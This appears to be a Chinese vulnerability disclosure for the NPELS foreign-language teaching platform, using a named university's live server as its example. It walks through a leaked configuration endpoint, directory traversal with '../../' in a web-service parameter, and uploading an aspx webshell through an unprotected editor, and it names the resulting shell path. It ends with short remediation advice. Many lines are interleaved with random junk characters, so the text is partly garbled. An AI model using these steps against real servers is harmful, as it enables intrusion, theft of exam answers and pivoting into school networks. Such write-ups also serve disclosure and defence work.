新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
  J5 O, O$ ~+ U. o
; h; s) t$ j: g! S详细说明：
+ _+ U. h# ]3 B. P5 W
' v, h) G# |  p9 H3 z5 L- h以南开大学的为例:
http://222.30.60.3/NPELS
( n  k% \1 J+ o9 C% t! KNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
- v" L# o# G) P+ m<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
* C# b8 k8 L7 W</setting>
及版本号
3 L7 G3 U: y! {  D<add key="TVersion" value="1, 0, 0, 2187">
</add>
9 ~: B6 H4 o9 X) ^1 O, d! v直接访问
/ z1 {( [) Y/ B. l3 L' }http://222.30.60.3/NPELS/CommonService.asmx
" _; t& C0 a1 q! J0 P- v  n使用GetTestClientFileList操作，直接 HTTP GET 列目录：
) |( K% |) `0 y( g' @! t: D$ \http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
: W" h$ U( A  j. t9 Thttp://222.30.60.3/NPELS/CommonS ... List?version=../../

! }* p& H2 H. O( t+ @0 S* m发现
+ H9 U  ?" w4 P& M& Z8 I# o: Uhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
5 j; c4 E5 F2 X; i4 e可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可
+ R6 g( P. C( e. ^) O# _
OOXX
, j3 @7 G" s4 I7 M0 z
Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：
6 X" d9 b; `( a$ ]4 o
( K) k( K  v! z列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
; C! t% [% c# L文件上传：
http://222.30.60.3/npelsv/editor/editor.htm

上传木马：
- ^, v9 |$ m/ `5 a0 ?" Bhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
+ H6 b0 w! K9 q) q! O$ f" x
: k3 m. {4 K" T/ w: e1 ~1 F修复方案：
; ?0 _+ F/ ?& q8 ]8 J* C好像考试系统必须使用 CommonService.asmx
; p! y2 K, w7 }1 \% m( q* g3 O最好配置文件加密或者用别的方式不让它泄露出来
7 `! z+ b8 I; W6 F并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​